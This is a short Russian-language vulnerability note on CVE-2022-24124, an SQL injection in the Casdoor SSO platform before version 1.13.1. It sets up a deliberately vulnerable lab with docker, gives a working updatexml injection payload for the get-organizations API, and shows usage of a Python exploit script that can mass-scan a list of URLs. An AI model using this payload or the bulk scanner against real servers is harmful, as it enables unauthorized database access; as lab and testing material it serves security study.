
Эксплойт CVE-2022-24124
Casdoor — это централизованная платформа аутентификации единого входа (SSO) на основе OAuth 2.0/OIDC.
CVE-идентификатор: CVE-2022-24124
CNPD-идентификатор: CNPD-202201-7304
Уровень опасности: Высокий (7.5 HIGH)
POC/EXP: Опубликован
Casdoor < Casdoor 1.13.1 // Все версии до 1.13.1 затронуты
Эта уязвимость относится к категории SQL-инъекций. В API запросов существует SQL-инъекция, связанная с параметрами field и value, как показано в api/get-organizations.
Загрузка уязвимого образа
docker pull vulfocus/casdoor:1.13.0

Запуск уязвимой среды
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Открытие страницы уязвимой среды

Использование POC для создания payload
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124
По материалам https://www.t00ls.com/thread-66989-1-1.html
В качестве тренировки написал Python-версию и добавил функцию массового обнаружения.